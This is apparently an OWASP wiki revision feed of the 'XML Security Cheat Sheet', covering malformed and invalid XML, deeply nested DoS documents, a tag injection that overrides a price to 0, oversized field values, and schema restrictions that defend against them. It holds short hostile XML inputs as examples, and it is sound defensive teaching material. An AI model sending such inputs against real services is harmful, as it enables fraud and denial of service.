To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
Code Sample 23: An XML Schema providing a set of restrictions over the document on Code 18&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224409</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224409"/>
				<updated>2016-12-21T15:49:32Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs a malformed XML document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
